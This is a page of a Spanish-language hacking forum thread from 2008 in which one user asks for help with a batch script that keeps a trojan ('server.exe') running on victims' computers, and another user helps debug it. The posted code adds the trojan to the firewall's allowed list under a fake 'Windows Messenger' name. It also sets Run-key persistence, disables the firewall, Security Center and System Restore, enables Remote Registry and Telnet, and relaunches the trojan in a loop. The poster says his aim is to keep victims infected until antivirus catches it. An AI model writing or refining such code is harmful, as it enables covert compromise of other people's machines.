elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Como hacer funcionar este batch perfectamente?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] 6 7 Ir Abajo Respuesta Imprimir
Autor Tema: Como hacer funcionar este batch perfectamente?  (Leído 25,224 veces)
SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #40 en: 13 Febrero 2008, 16:18 pm »

Me surgio una duda si tengo el troyano en system32/2145/server.exe podria llamarle haciendo esto.
Citar
inicio:
if exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\lsass.exe )
ping -n 120 localhost > nul
goto inicio

esto haria que llamara si existiese el server.exe ahi cada 120 segundos ? esta bien hecho el code?

Asi lo agrego al bat y le saco esta parte
:bucle
start /min system.exe
ping -n 120 localhost > nul
goto bucle

por la otra que seria mas facil y mas eficaz


En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #41 en: 13 Febrero 2008, 19:15 pm »

Esto llamaria a lsass.exe si existe server.exe, si lo que quieres es ejecutar el server deberia quedar así:

Citar
if exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\server.exe )

Por otro lado tanto si es server.exe(server de un troyano) como lsass.exe(bucle), supongo que deberian estar siempre en ejecución por lo que al llamarlos una y otra vez acabarás bloqueando windows.

No se si te referias a eso



En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #42 en: 13 Febrero 2008, 21:48 pm »

No Quiero hacer el bucle para llamar el server no quiero bloquearle la PC sino que llame a ese server silenciosamente en ejecucion. Tengo victimas con alto porcentaje de ping y cuando ejecuto denuevo el server vuelven inmediatamente :) y nose pierden y vuelven a la hora o cada 5 horas. Por eso el fin de este .bat es para eso. No perder nunca a la victima hasta que el antivirus te lo detecte :) y no perderlo por el ping o por otras causas Jeje. Espero respuesta tuya !! Nos vemos :D
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #43 en: 14 Febrero 2008, 18:09 pm »

Entiendo, creo que no deberia darte problemas. :)

Además supongo que tendrás ip fija, un no-ip o un sistema que te reporte la ip de la víctima (si no se encarga el propio troyano).
En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #44 en: 15 Febrero 2008, 15:27 pm »

Ok entonces esta bien si existe server.exe va a ejecutar el bucle no? Y si se reinicia la PC se inicia otra vez el .bat y se va a fijar si está y si es asi va a empezar otra vez el bucle verdad?
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #45 en: 15 Febrero 2008, 16:03 pm »

Así es. Pero, no entiendo al ver otra vez el código porqué si existe server.exe se ejecuta lsass.exe cada x segundos.
En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #46 en: 22 Febrero 2008, 16:57 pm »

No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #47 en: 26 Febrero 2008, 17:33 pm »

Citar
No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.

OK
En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #48 en: 7 Marzo 2008, 18:07 pm »

Dudas aqui !!

Código:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
[color=red]REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d[/color] %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio

Esto %windir%system32\2114\ es la ubicacion donde se aloja el troyano una pregunta system32 tiene algun abreviado en codigo como %windir% que seria Window? se pueden poner 2 if exist en un mismo bat? uno para llamar a otro bat y otro ubicado en el bucle como ves. Otra pregunta lo rojo eso agrega el .bat al msconfig cuando se reinicia la pc vuelve a ejecutarse el bat verdad?

El otro bat que seria este..
Código:
:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [color=red]lsass[/color]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r

la parte roja ahi no tendria que ser lsass.exe ?

Ahi ta esas mis dudas espero que me puedas ayudar otra vez.. y decirme si el bat esta bien.
« Última modificación: 7 Marzo 2008, 18:19 pm por SoloAki » En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #49 en: 7 Marzo 2008, 21:16 pm »

Hola de nuevo.

Creo que no hay una varible de entorno para system32, %windir%\system32 es lo más corto que te asegura a la vez no equivocarte de unidad. (que puede no ser C:)



La parte en rojo está bien si lo que quieres ejecutar al inicio el ctfmon.bat.

Y por último, sí, se pueden poner cuantos if exist quieras, pero ten en cuenta:

-El primero de tu script se ejecuta una vez al inicio (lsass.exe).
-El segundo se está ejecutando constantemente cada 100 pings siempre que exista system32.exe


Espero haberte ayudado. Pero para asegurarme de mi respuesta, ¿cual era el nombre de este script? ¿ctfmon.bat? - me lo he preguntado porque crei que ibas a compilarlo. :huh:

Si no es así explicame que nombre tiene cada archivo para que pueda darte una respuesta definitiva.

Saludos

En línea

Páginas: 1 2 3 4 [5] 6 7 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Porque no puedo hacer ping ??? y sin embargo mi navegador entra perfectamente???
Redes
The_Saint 4 14,782 Último mensaje 9 Junio 2011, 23:48 pm
por madpitbull_99
Como hacer una consola batch
Scripting
zikotik 4 2,218 Último mensaje 8 Julio 2013, 17:43 pm
por OmarHack
Configura perfectamente tu WiFi con este programa
Noticias
wolfbcn 0 658 Último mensaje 10 Enero 2016, 21:22 pm
por wolfbcn
(solucionado) no consigo hacer funcionar un codigo batch
Scripting
hckcrck 6 2,029 Último mensaje 17 Junio 2016, 17:47 pm
por hckcrck
Hacer funcionar el lector de bandeja de discos con este lenguaje .net
.NET (C#, VB.NET, ASP)
Meta 7 3,442 Último mensaje 19 Noviembre 2017, 01:52 am
por Meta
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines